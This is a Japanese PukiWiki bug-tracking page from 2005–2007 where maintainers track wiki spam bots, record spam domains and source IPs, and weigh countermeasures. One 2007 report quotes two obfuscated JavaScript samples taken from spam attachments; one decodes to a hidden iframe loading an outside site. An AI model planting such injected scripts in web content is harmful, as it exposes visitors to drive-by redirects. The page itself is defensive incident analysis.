* [spam] Wiki Spamming [#u38b497a]

-ページ: BugTrack
-投稿者: [[henoheno]]
-優先順位: 普通
-状態: 着手
-カテゴリー: その他
-投稿日: 2005-01-02 (日) 17:52:48
-バージョン: 

-------------------
#contents
-------------------
**メッセージ [#l19130a5]

2004年末から、とうとう日本語のWikiもSPAMボットの対象に含まれてきた様です。一度に数十単位のWikiサイトが自動修正ロボットによる書き込みを受けています。以下にその概要、動向などをまとめます。

- ※PukiWiki.org などには以前から単発でSPAMは来ていました。Hiki関係では2004年8月ごろから、連発するSPAM書き込みが問題になっていたようです
-- http://kazuhiko.tdiary.net/20040830.html#p02


//** まとめ: 今回悪用されているDNSサービスあるいはDNS名 [#efa604ca]
//※これらがそのままブラックリストになるかもね
// ここにあった項目は、spam.ini.phpに収録済みか活動を休止しています -- henoheno

** 関連情報: 既存のブロックリスト [#na34ede2]

- WIKIBLACKLIST -- http:// wikiblacklist.blogspot.com/
-- クライアントのIPアドレス、DNS名ではじくタイプ

- Pear: Net_DNSBL -- Checks if a given Host or URL is listed on an DNSBL or SURBL
-- http://pear.php.net/package/Net_DNSBL

- Bulkfeeds: SPAM ブラックリストの公開、Submission API と MT プラグイン
-- http://blog.bulknews.net/mt/archives/001834.html
-- http://bulkfeeds.net/app/blacklist

- BBQ あらしお断りシステム http://bbq.uso800.net/

- [[PukiWiki Plus!]]: Documents/Blocking SPAM
-- [[plus:Documents/Blocking SPAM]]
-- "この機能を有効化することで、文書などの書き込み時に、秒単位で処理が遅延します。"
-- wikiwiki.jp の例 http://wikiwiki.jp/?Notice%2F2006-07-13

- The public TorDNSEL service https://www.torproject.org/projects/tordnsel.html.en


** 関連情報: 既存のスパム対策 [#qc48676d]

- WordPress Blacklist で、コメントスパム撃退 -- リンク切れ
// http://aoiro.s58.xrea.com/modules/wordpress/index.php?p=226
//↑リンク切れになっていたのでコメントアウト

- Preston Wiki: コメントスパム  -- http://www.preston-net.com/wiki/index.php?%5B%5B%A5%B3%A5%E1%A5%F3%A5%C8%A5%B9%A5%D1%A5%E0%5D%5D

- 女子十二月号: MovableTypeコメントスパム対策
-- http://sadayx.ddo.jp/blog/archives/000045.html
-- "コメント欄にhidden属性の変数を追加"

- Wiki Spam Report  -- http:// groups.google.co.jp/groups?hl=ja&c2coff=1&threadm=ee2a733e04121404417e26f337%40mail.gmail.com&frame=on
-- www.rubygarden.org の場合。IPアドレスから名前が引けなかったり、そのWikiのユーザー情報を持たないアクセスを、全く見かけが同じの別のWikiに送り、自由に荒らさせる。(荒らした結果も送りつけるため、相手にはわからない)

- rel="nofollow" => [[BugTrack/785]]

- [[official:自作プラグイン/comment_nospam.inc.php・pcomment_nospam.inc.php]]

- akismet.inc.php
-- http://lsx.sourceforge.jp/?Plugin%2Fakismet.inc.php
-- http://gigazine.net/index.php?/news/comments/20080110_pukiwiki_akismet/


** 歪曲文字画像によるセキュリティ [#wd313d25]

- [[CAPTCHA]]

- Passion For The Future: スケベ心で巨富を築く技術?テストステロンコンピューティング
-- http://www.ringolab.com/note/daiya/archives/000696.html
-- 「歪曲文字列画像によるセキュリティ」を破らせる方法

** 関連情報: 検知について [#v574f5f1]
- とにかく $notify を 1 にして、更新履歴(とクライアントのIPアドレス等)をメールで受け取る様にしましょう。

** 関連情報: 駆除作業のこつ [#jcc70ae8]
- どこに潜んでいるか、状況確認などはGoogleが教えてくれる (※「web全体で検索」)
-- [[Google.en:wiki uni.cc]]
-- [[Google.en:wiki 6x.to]] etc
- Googleのキャッシュを洗え (ページ全てがSPAMであっても、いきなり削除せず、まずは「SPAMs are removed」とでも書いたメッセージに更新する等。可能であればそれを凍結)
-- diffを削除
- 見知らぬWikiにSPAMを見かけたら、他のページも疑え
-- (MoinMoinの場合) PageSize を一覧する機能を用い、サイズの大きなページからチェックするのが有効
-- (RecentChanges などで一覧した場合)同じ時刻、同じホストによる書き込みは全て怪しい
-- Wikiサイトの検索機能を使う
- (サマリーを入力するWikiの場合) 「Spam removal」「Despam」などと書いておく
- (アカウントを要求するWikiの中にSPAMがある場合) そのシステムには捨てアカウントを作ることができるのだろう。SpamRemover といったアカウントで除去可能。



** 調査件駆除中: SPAMからのメッセージ [#u65d61a7]
海外のWiki SPAMを探索中に同じメッセージを何度も見かけると、さすがに慣れて来ます。それでこれがまた、検索のキーにもなるんですよね。

*** おまえのリンクも消してやる (HOW and who are YOU) [#k3506a8f]
- [[Google.en:wiki delete yours]]

 PLEASE, IF YOU ADD YOUR LINKS DON'T DELETE MY LINKS. 
 IF YOU'LL DELETE MY LINKS I'LL DELETE YOURS!!!

※下に続くのは他のサイトでもSPAMされているURLの列挙


*** 日本のすばらしいリンクを毎日お届け [#l36fe30d]
- [[Google.en:wiki delete introduce japan]]

Hiki方面には2004/10ごろから登場していたようですね。

 **************Please do not delete,I send this message only one time,
 in order to  introduce some japan website.IF you delete,I will publish
 every day.***************
 
 I am from JAPAN,I want to introduce some very good JAPAN sites to you,
 so you can find something about JAPAN cluture,people.

※直後に続くのは他の漢字文化圏のサイトへのリンク。例えば: *.ec51.com
- [[Google.en:wiki delete introduce japan ec51]]

漢字文化圏であることを利用して、日本を隠れ蓑にしているようです (^^;


** 調査件駆除中: ドメインおなかいっぱい (2005/01/04) [#a56f07bf]
ところで上記の ec51, 周辺のSPAMに使われているドメインを確認したところ、いずれも所有者が同一人物の様で・・・。

 # NICKNAME: Something importer
 # Whois says Shenzhen, Guangdong, China.
 #.computer-importers.org
 #.consumer-electronics-importers.org
 #.electrical-components-importers.org
 #.food-importers.org
 #.furniture-importers.org
 #.fashion-accessories-importers.org
 #.garden-tools-importers.org
 #.home-appliances-importers.org
 #.home-decoration-importers.org
- [[Google.en:wiki computer-importers]]

 # NICKNAME: Something manufacturer
 # Whois says Shenzhen, Guangdong, China.
 #.auto-accessories-manufacturers.org
 #.baby-products-manufacturers.org
 #.ceramics-manufacturers.org
 #.chemicals-manufacturers.org
 #.clothing-manufacturers.org
 #.gifts-manufacturers.org
 #.glass-manufacturers.org
 #.instruments-manufacturer.org
 #.kitchenware-manufacturer.org
 #.lamps-manufacturer.org
 #.leather-manufacturer.org
 #.tools-manufacturer.org
- [[Google.en:wiki gifts-manufacturers]]

 # NICKNAME: Importer King
 # Whois says Shenzhen, Guangdong, China.
 .ec51.com       # EC51 Importer
 .ec51.net       #
 .ec51.org       # Whois Registrant Name:the same. Reserved.
 .ec61.com 
 .china-wiki.org
 .exporters-wiki.org
 .importers-wiki.org
- [[Google.en:wiki importers-wiki]]

これらのドメインを取得した側の意図を推測するのは非常に難しい :P (※ニックネームはhenohenoによる)


----------------------------
* SPAM report [#x3b587b5]
** old reports [#fe261e81]
これ以前のものは[[./old_report]]へ移動しました。
** 2005/04/11 [#y4f7de97]
-http://xoops.sourceforge.jp/wiki/xoops2/index?cmd=backup&page=FrontPage&age=13
-http://spam.g.hatena.ne.jp/keyword/atspace%2ecom
 # 67.15.14.197
 atspace.com


** 2005/07/16 [#h4cb6338]
-PukiWiki.orgへの攻撃(0:20頃~1:50頃) -- [[でぃあばぁ]] &new{2005-07-16 (土) 02:25:38};
*** 特徴 [#vd0d85a9]
-パターン~
下記の形式で100行程列挙
 ![ hardcore sex couple anal oFyqL | http:// aftar.bpa.nu/2005/bomba/hardcore-couple-anal-sex.html ]
-貼るURL
--*.bpa.nu/*
--*.dnip.net/*
--*.dundeeleagues.ca/*
--*.homes.com.au/*
--*.nerdcamp.net/*
--*.prettyfar.com/*
--*.whyza.net/*
--*.zenno.info/*
*** コメント [#lf0dd1bf]
-devは何故か[[B-Wiki]]の所だけタイムスタンプを更新しないで定期的に書き換えられている模様。cURLを使っている? --  &new{2005-07-16 (土) 05:53:29};
-本日14:55頃から再び攻撃中。 -- [[でぃあばぁ]] &new{2005-07-17 (日) 15:10:30};
-この不毛な戦いになんとか終止符を打たなければなりませんね。攻撃されるたびにRecentChangesがばらばらになって見にくい (^^; -- [[teanan]] &new{2005-07-17 (日) 16:22:37};
-IPとかUAとかその他色々記録してない/記録が見られない事には対処のしようが無いんじゃない? --  &new{2005-07-17 (日) 16:28:21};
-- お疲れ様です。IPやUAはWebサーバーのログを見られるのであれば解ります。さもなくば、PukiWikiの更新をメールで受け取る事で記録できます。 -- [[henoheno]] &new{2005-07-17 (日) 21:57:10};
-少なくとも今回の件に関しては禁止単語で対処出来そうです。casinoとhardcoreで結構弾けそう。 -- [[でぃあばぁ]] &new{2005-07-17 (日) 16:32:31};
-- その場合、casinoとhardcoreとかバイアグラに関するまじめな話ができなくなってしまいます :D -- [[henoheno]] &new{2005-07-17 (日) 22:01:15};
-一定時間内に同一IPから書き込めるページ数に制限をかけられないですかねぇ・・・ -- [[teanan]] &new{2005-07-17 (日) 19:40:50};
--復旧する方にも制限がかかってしまう、諸刃の剣ではありますが (^^; -- [[teanan]] &new{2005-07-17 (日) 19:44:33};
-同一内容の複数書き込み時にリミッターをかけるとかはどうでしょうか。同じ内容を二度も三度も書き込むのはSPAMくらいな気がします。 -- [[Ratbeta]] &new{2005-07-17 (日) 20:51:50};
-- ふむふむ。しかし私が攻撃者なら、その対応には「ランダムな文字列を追加する」ことで回避できると確信するでしょう。 -- [[henoheno]] &new{2005-07-17 (日) 22:00:08};
--なら同一URLの複数書き込みを…ってもっと意味がなくなりますね (^^; -- [[Ratbeta]] &new{2005-07-18 (月) 12:07:32};
-- 対応策を用意する側のコストに対して、それを回避する側のコストがなさすぎる様ですね :D 決定打というよりは手法(考え方)の一つの様です。 -- [[henoheno]] &new{2005-07-18 (月) 22:18:44};


** 2006-07-18 PukiWiki official/devに対する、新規ページを多数作成したり、多数のページに追記するspam [#q7ce7fdc]
- ページを新たに生成するもの、ページの先頭に付加するもの、コメント追加するものの3種類確認。記載される内容は若干異なるものの、URLとしては、下記のひとつのみ。
 http:// www.areaseo.com
- 新たにページを生成するものは、既存のWikiNameのページを全て小文字にして生成していました。例えば、「PukiWiki」→「pukiwiki」  -- [[teanan]] &new{2006-07-18 (火) 13:27:15};
- 皆さん対応ありがとうございました/お疲れ様でした (^^; 既存のページ名をモディファイして新しいページ名を生成しているのは、Wikiのかさ増し、ないし情報の埋め込みが目的のように見えますね。 -- [[henoheno]] &new{2006-07-18 (火) 22:54:19};
-- 今回のpostは、以下の複数のホストから来ているようでした。韓国系IP+αの様ですね。
 210.105.169.172
 59.13.242.201
 210.113.119.78
 163.180.130.202
 203.241.185.196
 61.120.143.110
 222.236.191.40
-- 複数のホストが二つの内容を書き込んでいて、最初はyellopagesといった言葉を使ったyellowpage誘導およびそのpagerank向上を狙ったspam。次にpagerankといった言葉を使ったpagerank目的のspam。全てがほぼ同時刻にpostしていますが、その内容は、同じ時間帯にはほぼ同一であるようでした。botnet経由の効率的なアクセスかな?
- そういえば[[teanan]]さんofficial/devの更新メール受け取ってみますか? (とここに書いてみる) -- [[henoheno]] &new{2006-07-18 (火) 23:00:19};
-- ぜひお願いします! :) -- [[teanan]] &new{2006-07-19 (水) 01:01:27};
- [[:CategoryDev/Document/About]] などにも来ていました。 -- [[henoheno]] &new{2006-07-18 (火) 23:20:05};
-- おおっと、その辺は盲点でした。更新メールがないと、こういうところへのspamはわかりませんね (^^; -- [[teanan]] &new{2006-07-19 (水) 01:03:20};
-- official/devの更新メールが [[teanan]]さんにも届くよう、設定を追加しました。上のページについては検索で最初に見つけました :D -- [[henoheno]] &new{2006-07-23 (日) 23:13:50};

** trackerへのspam攻撃 [#d6774dfd]
- [[official:欲しいプラグイン/234]] に割と頻繁((自分以外の人も削除していると考えるとかなりの頻度?))にSPAM書き込みがあるので、ページの凍結を希望します。((ここでいいのかな?)) -- [[okkez]] &new{2006-01-05 (木) 21:23:19};
-- 私も見つけたら削除しています :) 内容が入っていないと凍結できないので、投稿待ちですね (^^; -- [[teanan]] &new{2006-01-05 (木) 21:30:34};
-- はたして凍結で防げるかな? と思わなくもありませんが、試してみるならば適当なダミーページを作成して凍結していただいて構いませんですよ > teananさん -- [[henoheno]] &new{2006-01-05 (木) 23:38:24};
-- 試してみます :) 直接postで着ているようであれば防げないかもしれませんね (^^; -- [[teanan]] &new{2006-01-08 (日) 23:01:38};
-- この件、ちょっと小細工してみたいのですが良いでしょうか。具体的にはformの変数名を変えてみようかと。一時凌ぎですけどね (^^; -- [[teanan]] &new{2006-04-19 (水) 12:48:28};
-- お疲れ様です。特にofficailに対するチャレンジの続きの話ですよね、どうぞどうぞ。バックアップは取りましたし、所有グループも統一しておきました。ついでに今のsf.jp webサーバー周りを見てみて下さい。ある程度ファイルも整理してあります。 -- [[henoheno]] &new{2006-04-19 (水) 23:38:05};
-- 一通り終了しました。:config/plugin/trackerに「欲しいプラグイン2」を追加しました。各フィールドは xx1 みたく、少々分かりづらくしてあります。次に、従来の :config/plugin/tracker/欲しいプラグイン を 「~/欲しいプラグイン.orig」にリネームしました。 -- [[teanan]] &new{2006-04-20 (木) 01:32:27};
--- 従来のURLにPOSTしても、trackerの設定がないよ、で終了するはず・・ -- [[teanan]] &new{2006-04-20 (木) 01:33:58};
--- ちなみに、field名を日本語にしてしまおうと思ったのですが、tracker_listの改造が必要なのでやめました。・・・というか、trackerプラグインにパッチを当ててみたらタイムアウトするようになったので諦めました (^^; -- [[teanan]] &new{2006-04-20 (木) 01:35:54};
-- 今度はBugTrackに出現したかも (^^; -- [[teanan]] &new{2006-04-20 (木) 07:00:25};
-- 欲しいプラグインに来ていたspamは、とりあえず撃退できているようですね。 -- [[teanan]] &new{2006-04-24 (月) 17:33:57};
--- 興味深い対処法ですね :) とりあえず凍結はあまり意味が無かったという認識でしたでしょうか。いろいろ試して、どうだったかがまとまってくると多分他の人も助かります -- [[henoheno]] &new{2006-04-27 (木) 23:57:46};
- (項目をわけました。) -- [[teanan]] &new{2006-05-20 (土) 09:36:00};
- 対策をして1ヶ月程経過しました。[[official:欲しいプラグイン]]へのspamはある程度ブロックできてそうに思いますので、少しまとめておきます。 -- [[teanan]] &new{2006-05-20 (土) 09:36:00};
-- trackerへのspam攻撃の対策には、定義名(:config/plugin/tracker/hogeの設定名)変更が効果的のようです。
-- spam書き込みは、trackerプラグインのpostで来ていると思います。trackerの設定名が変わると、postで指定された設定名が見つけられずにエラーとなります。
-- また、英語圏からのspam書き込みが目立ちますので少し工夫ができます。例えば「state」フィールドには「NY」などの単語が指定されてきていました。定義名やフィールドの定義に分かりやすい英単語を使用するのはspam送信者の理解を助けてしまいますので、避けた方が良さそうです。フィールドの定義には日本語が使えませんが、定義名に日本語を用いるのは良い考えかもしれません :)
-- trackerによるspam書き込みのあったページを凍結するのは無意味です。trackerプラグインは既に存在するページへの書き込みは行いませんので、新たなページへの攻撃となります (^^;
- コンテンツ側の設定変更でとりあえず逃げられるわけですが、当然ながら、一時凌ぎにしかなりません。trackerへのspam書き込みを抑止するためには、trackerプラグインの修正が不可欠ですので、今後の課題をあげておきます。 -- [[teanan]] &new{2006-05-20 (土) 09:53:06};
-- postされたtrackerデータを、直接新規ページに書き込んでしまうのは止めたほうが良いです。プレビュー画面を挟むだけでもspam書き込みの抑止になります((調べてみたのですが、ページ名を自動的にふる機能があるため少々面倒です (^^; ))。
-- trackerフォームによるpostかどうか、簡単な方法でも良いので判断できるようにした方が良さそうです。
- trackerへのspamについては、昨今では[[BugTrack2/200]]によってまとめて対策できています。コンテンツのパターンによるブロックでも結構な -- [[henoheno]] &new{2007-03-11 (日) 23:53:57};
//#comment

**2007/01/22 Attachを利用したspam攻撃 by Logue [#i8371374]
手口

+任意のページに誘導するための任意のファイルを添付。
+様々な被スパムblogにその添付ファイルへのリンクを張る
+スパムblogサイトをGoogleなどの検索ロボットがクロールするときに、該当添付ファイルへのリンクが評価される
+該当添付ファイルが上位にヒットしDDos攻撃まがいのアクセス集中発生。
+添付ファイル同士で疑似サイトを生成する

被害状況

該当添付ファイルが添付されたのは、22日で削除したのは翌日。ただし、多数のblogサイトに該当ファイルへの添付への直リンクが張り巡らせてあるため、1週間後になってからDDoS攻撃まがいのアクセスの集中が起きた。

また、htmlファイルと読み込ませないようにmime-typeを指定してあったにもかかわらず、Googleがしっかりと添付ファイルの内容をクロールしている点が気になる。

もちろん、トップページを凍結していれば防げた可能性もあるが、添付ファイルに直リンクし、被リンク数が多ければ重要だろうとされるGoogleの性質を悪用してあるため、深い階層に知らないうちに添付されている添付ファイルの場合、発覚が遅れる可能性が高い。

対策案
-robot.txtに以下の行を追記
 Disallow: /?plugin=attach&pcmd=open&file=*
-添付ファイルの直リンクを禁止

#hr
- 新しいタイプのspamを確認しました。これは、PukiWikiのファイル添付機能を使って何らかのHTMLを表示させ、スパム先でその添付ファイルに直リンクさせるというもののようです。これは、自分のサイトのトップページが異常に増えていたので調査したところ発覚しました。添付されていたファイルの内容は化けて実害は無いようでしたが、一応全ページにファイル添付できるwiki性質を考慮すると、今後も被害の拡大が予想されます。リファラーを解析し、調査してみた結果、すでにいくつかのPukiWikiサイトでも同様の被害にあっているようです。また、ファイルが添付されるページは、必ずしもトップページというわけではないようです。とりあえず、添付ファイルの外部直接参照はできないようにしたほうがいいと思われますが、いかがでしょうか? -- [[Logue]] &new{2007-01-23 (火) 15:59:03};
- [[開発日記/2006-12-16]] spam urlとして(脆弱な設定の)wikiを狙うというのは一つの方法として確立されているはずで、恒久対策は、第三者に対する添付ファイルを禁止することでしょう。この件は検索エンジンとは絡まないと考えているのですが、検索エンジンの関与というのはどこからそのように思われたのでしょうか。別件であるならば、話を分割して下さい -- [[henoheno]] &new{2007-01-30 (火) 06:17:36};
- Googleの検索結果ですが、アドレスをよく見てください。
 http://www.google.co.jp/search?q=black+movie%E3%80%80porn%E3%80%80ebony+
 free&complete=1&hl=ja&lr=&safe=off&start=30&sa=N
検索結果に表示される内容がlogue.tk/?plugin=attach&pcmd=open&file=070122-06-g05.html&refer=FrontPageとなっています。一応、mime-typeはplain/textになっていますが、明らかに添付ファイルの内容がクロールされたように思われます。変なファイルがアップされたときに、それを削除するまでに1日もたってないのに、これだけのアクセスが集中し、その検索元をみると、ページではなく添付ファイルの内容にヒットしているという事象は問題だと思います。 -- [[Logue]] &new{2007-01-30 (火) 08:04:23};
- Logueさんの触れている話題(htmlファイルへを添付し、そこへのアクセス増が負荷に)に近そうな事例を見つけました。 http://tutui.net/blog/archives/326 -- [[henoheno]] &new{2007-02-11 (日) 22:30:04};
- 指定された拡張子のファイル(例えば.html)の添付を制限するような事はできないのでしょうか? --  &new{2007-02-12 (月) 03:55:46};
-- (この件は、既に結論が出ている以前の話を冗長に含んでいますので、これ以上同じ話題を繰り返さないよう、整理が必要です)残念ながら、形式的な拡張子が .html であるかどうかと、中身がHTMLであるかどうかは無関係でしょう。検索エンジンやWebブラウザによっては、拡張子を無視して独自に中身を判断する可能性があります。後者の具体例はIEです。 -- [[henoheno]] &new{2007-02-12 (月) 18:03:45};
- 今週に入ってから異常な量のスパムを確認しました。その多くは、henohenoさんの言うように基本的なセキュリティ不足が原因となっているのはわかります。しかしながら、今回のスパムは、添付ファイルや設定ミスによる脆弱性が、''他のWikiサイトにも被害を与える''という点で''深刻''なものです。他のWikiサイトをみていると、該当添付ファイルの再投稿もかなり高い頻度で再添付されているようです。たとえば、[[Slash.jp Wiki>http://slashdotjp.sourceforge.jp/]]で添付ファイルリストを見ると、%%その激しい攻防が%%見て取れます。少なくとも、PukiWikiのトップページで注意を呼びかけるべきではないでしょうか? -- [[Logue]] &new{2007-02-13 (火) 22:55:38};
- 調査していたところ、IP:&color(red){85.17.103.104};から、&color(green){070110-?-g6?.html};という形式の名前のファイルをあちらこちらの添付可能なwikiにアップロードするロボットを確認。ただ、怖いのは発覚を遅らせるもしくは、内容を更新するため''数分間隔で内容が微妙に異なる同一名のファイルを再添付している''模様。被害に遭っているwikiサイトの添付ファイルのバックアップの履歴をみるとすごいことになっています! &br;
添付されたファイルの内容は、ポルノ系のワードが多く登録されていました。いくつかの亜種がありますが、このファイルを開くと任意なサイトに飛ばされます。
 <script>function ewe(ewr,erw){erw="erw".length;var rew="";var rwe="";
 rew=new String(ewr);rre=rew.length;wre=rre%erw;var PI=ewr.length;
 ere=rew.substring(0,rre-wre);ree=rew.substring(rre-wre,rre);
 with (Math) {wew=round(log(pow(PI,0)));}var eee=ere.length;
 var rer=ere.length;while (eee>=0)        {eee=rer-erw*(wew+1);
 var wwe=rer-erw*wew;rwe+=ere.substring(eee,wwe);wew++;}rwe+=ree;
 wer+=rwe;return 0;}</script><script>var wer="";
 function NF1(){ewe("rip/sc\"><.jsien/alorgab.ncf://ttp=\"hsrcpt 
 cri\n<spt>cri</sd\"}ateLocBe ot anne CPage=\"itlt.tmenocu {due) tr 
 ==er)errrefnt.umedocop.t(ttes?/.!/\\f (t>irip<sce>\ntyl</sne} noay:
 spl{didy >boyle<stt>");document.write(wer);return 0;}</script><script 
 language=javascript> NF1();</script>
このようなソースで、かなり難解になっています。最近では、
 <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69
   %74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74
   %70%3a%2f%2f%70%72%65%76%65%64%74%72%61%66%2e%62%69%7a%2f
   %73%74%72%6f%6e%67%2f%30%34%39%2f%20%77%69%64%74%68%3d%31
   %20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e
   %27%29%3b'));</script>
のように完全に符号化されているタイプも確認しました。[[かなり、危険だ>http://www.google.co.jp/search?q=script%3Eeval(unescape&hl=ja&rls=GGIT,GGIT:2007-03,GGIT:ja&start=10&sa=N]]と思います。
 203.88.152.x
 203.88.155.x
 219.65.75.x
 80.252.248.187
も同一スパムを行っている?-- [[Logue]] &new{2007-02-17 (土) 03:50:37};
- お疲れ様です ;) 本件を厄介に思われているのは良く伝わっています。ただ、やはり問題を切り分けるテクニックが今回あまり活かされておらず、結果的に既存の話題を冗長に展開されている様に思えるのが悲しいです。 今後皆が頼りにするような情報を結果的に生み出す事はできますか?  私は誰がツッコミ担当になっても良いと思っています。Wikiの特性をうまく活用して下さい。 -- [[henoheno]] &new{2007-02-17 (土) 11:21:37};
-- (0) 前提として、セキュリティホールを埋めると言うことは、失敗する可能性を''ゼロ''にする事と同じです。(参考:マーフィーの法則、 birthday attack、targetted attack) -- [[henoheno]] &new{2007-02-17 (土) 11:24:34};
-- (1)「添付ファイル機能を第三者に公開する」設定となっているWebサイトを攻撃側が流用する件。これは[A]攻撃側が自力で攻撃用のWebサイトを用意したり [B]無料Webスペースを利用したり [C]静的ページを変更できるほかのWebサイトのシステムを流用したり するようなテクニックの(''労力が低いタイプの'')亜種です。添付ファイルにはまた厄介な特性がありますから、第三者に添付される可能性をゼロにするか、添付された内容を適切に検証する体制を用意できると証明できないならば、どのような対応も無意味です。なお、サイトごとに異なるパスワードを定義するような運用(ローカライゼーション)は無差別行為には意味がありますが、それを人力で無視して一つ一つウイルスや、URLや、JavaScriptを植え付けようとする targetted attack には無意味です。 こうした話題は以前から取り上げられているはずです。 -- [[henoheno]] &new{2007-02-17 (土) 11:24:48};
-- (2)攻撃側がコンテンツにキーワードや、もし可能なら(検出のしにくい形で)JavaScriptを埋め込む件。ここではあまり話題になっていなかったかもしれませんが、1の際に使われる一般的なテクニックなので私には驚きはありません。このテクニックは一つではないので、もし興味があれば、専用のBugTrackに参考としてまとめるのが今後のためになると思います。 -- [[henoheno]] &new{2007-02-17 (土) 11:25:00};
-- (3)結果的に複数のIPアドレスを発信元にする件。日常的に(結果的に)IPが偽装されている現在では(手を抜いた攻撃者以外には)残念ながらもう(永続するという意味の)決定的な情報ではありません。しかしながら、一定期間ないし一定の手順で自動的にアクセスを妨げるという防御側のテクニックが存在しており、部分的に効果があったり、なかったりするのは既知の通りです。実現方法としては コンテンツを受け取る部分で動作させる自動学習、DNSベースのRealtime Block List、応答遅延 などがあり、それぞれに利点と欠点がありますが、主な問題点はblock listの運用やその手法自体にあります。 -- [[henoheno]] &new{2007-02-17 (土) 11:25:13};
-- (4)検索エンジンのクローラーの影響を下げたいというSEO的な願望。結局どれも(短期、中期、長期的に)技術的な確証がありません。また今回の根本的な原因である1の部分に穴があるのであれば、きっかけが無くなりませんから(確率的に)無意味です。 -- [[henoheno]] &new{2007-02-17 (土) 11:25:28};
- いえ、私はスクリプトに問題があるからどうにかしてくれと言ってるつもりはありません。ただ、簡単な対処法である程度被害を食い止める事ができるので注意を呼びかけて欲しいと言いたいのです。数分単位でファイルの削除と再添付を繰り返す上、直リンクを繰り返しているのでこれまでのwikiスパムと比較してサーバーへの負荷が大きいのではないでしょうか?しかし、ファイル添付に限定してCHAPTCA採用してもいい気が・・・。 -- [[Logue]] &new{2007-02-18 (日) 12:47:09};
- こんにちは。コレ、やられました。あんまり見てなかったので、全然気づきませんでした。サーバに負荷かけてたらしく止められてやっと気付きました。すごい危険ですよね・・・。(- -; こーゆーのはメンテしないといけないんだなぁ。。。 -- [[Yun]] &new{2007-02-22 (木) 16:25:55};
- 追加報告です。

先ほどの&color(red){85.17.103.104};からのアクセスを弾いたところ、ファイルを添付するような行動はみられなくなりましたが、依然としてアクセスが異常に増大している点と、リンク元に被害にあったほかのWikiからの異常なアクセスが目に付きました。

サーバーログを見てみると、&color(green){unknown.hostforweb.com};からのアクセスおよび、User-Agentが&color(blue){WWW-Mechanize/1.0};のアクセスが異常に増大している点が見受けられました。そこで、85.17.103.104以外に、この2点を制限したところ、普段通りのアクセス数に近くなりました。

おそらく、攻撃者は、ファイルの多重添付以外に、別の場所に設置した単純なスクリプト(おそらく、cronで定期的に動かしていると思われる)によるリファラースパムも同時に行っていると推測できます。ただ、攻撃者は、なぜ、このスクリプトのUser-Agentを偽造しないのか疑問に思います。

アクセス元解析に利用している[[Trackfeed>http://trackfeed.com/]]のサービスの性質(JavaScriptで環境変数を取り込む)からは、このようなwikiサイトからのリファラーは一切記録されておらず、このことから推測すると攻撃者の意図はJavaScript型アクセス解析に足跡が残らないようにするために、このような処置をした可能性があります。(反対に、PukiWikiのリンク元記録はサーバーで処理するため残る)

unknown.hostforweb.comについてのwhoisをしてみても結果が奇妙です。このunknownが含まれるホストについて、少し気になったので調べてみましたが、どうやらこれは、&color(maroon){正しいIPアドレスの逆引きホスト名が登録されていない};という意味らしいです。

そうなると、攻撃者はこのhostforweb.comの脆弱性を踏み台にしてリファラースパム行為を行っているものと推測できます。別のサーバサイドスクリプトからPukiWikiの内容に干渉できる可能性は低いと思いますが、unknown.hostforweb.comに限らず、unknownを名前に含むホストは、すべて弾いてしまったほうがいいかもしれませんね。 -- [[Logue]] &new{2007-03-11 (日) 20:50:51};
- お疲れ様です。私も勘違いしている所があると思いますから、不明点があれば指摘して下さい・・・ (^^; まず、攻撃側が単純なツールを使っている場合、特に工夫せずともJavaScriptは実行されないでしょうから、JavaScriptについては気にされなくて良いかと思います。 -- [[henoheno]] &new{2007-03-12 (月) 00:56:50};
- unknown.hostforweb.com というのはPOSTした相手のIPアドレスを逆引きした結果ですね。それは hostforweb.com のDNSサーバーがたまたまそのような答えを返しているのではないでしょうか。どのような答えが返るかはDNSサーバー次第だったかと思いますので、hostforweb.com についてはうまく行くかもしれませんが、他は期待外れに終わると思います。 -- [[henoheno]] &new{2007-03-12 (月) 01:04:20};
-- ホストごとに異なる名前を返す例を沢山ご存知のはずです。ISPにぶらさがっている一般ユーザーのIPアドレスとか。 -- [[henoheno]] &new{2007-03-12 (月) 01:06:45};
--- あー、そうでした。unknownって書いてあったのでメールの送受信におけるunknownホストと混同していたみたいです。失礼しました。ただ、気がかりになるのは、[[ここ>http://nikki.hart.co.jp/index.php?UID=1167109073]]の記事で、unknownは未使用アドレスに多いとかかれているところです。 -- [[Logue]] &new{2007-03-12 (月) 01:14:43};
- 今回気になるのは「他のWikiからの異常なアクセス」という下りです。いい(カモの)サイトとして、logue.tkのそのWikiのURLがあちこちに張られている状況になっていませんか?? そうならば、第三者への添付ファイルを許可する状態をすぐに止めていただきたいのですが、可能ですか? -- [[henoheno]] &new{2007-03-12 (月) 01:10:21};
- まったくないです。2/3のリンク元のwikiは、ファイル添付された形跡や、場合によってはページすら作られた形跡がない、全く関係ないリファラーでした。先ほどJavaScriptのアクセスログには一切これは残っていません。おそらく、ランダムにwikiサイトのアドレスを組み合わせているのではないでしょうか。先ほどのアクセス制限をすることで、ぴたりと止みました。 -- [[Logue]] &new{2007-03-12 (月) 01:21:57};
- 美麻Wikiでシステム的に修正している点 - 美麻Wiki http://www.miasa.info/index.php?%C8%FE%CB%E3Wiki%A4%C7%A5%B7%A5%B9%A5%C6%A5%E0%C5%AA%A4%CB%BD%A4%C0%B5%A4%B7%A4%C6%A4%A4%A4%EB%C5%C0 のattach.inc.php のパッチを当てて設定したら、htmlの添付スパムは防げました。ご報告までに・・・ -- [[TOBY]] &new{2007-04-07 (土) 16:15:46};

//#comment

** コメント [#b6a3471c]
別件のSPAMを見かけましたら、お知らせください。
-akira_youの日記: 崩れた数字を表示させて人間かどうかチェックするというアイディアをさっくり書いて見た。 http://d.hatena.ne.jp/akira_you/20050106#p2 --  &new{2005-01-06 (木) 21:26:03};
-崩れた数字じゃなくて質問内容も楽しめる唐揚げ方式にしてみました。 http://d.hatena.ne.jp/akira_you/20050107#p3 -- [[akira_you]] &new{2005-01-07 (金) 15:44:25};
-- moe -- [[henoheno]] &new{2005-01-09 (日) 11:18:12};

-SPAM書き込みそのものの抑止効果はないかもしれませんが、googleが出した[[この対策:http://www.google.com/googleblog]]を取り込むのはどうでしょうか? --  &new{2005-01-20 (木) 09:34:33};
-a要素にrel="nofollow"属性を付加する事でPageRankへの反映を抑止するという対策法。参考:http://www.google.com/googleblog/2005/01/preventing-comment-spam.html -- [[Mizar]] &new{2005-01-20 (木) 14:34:31};
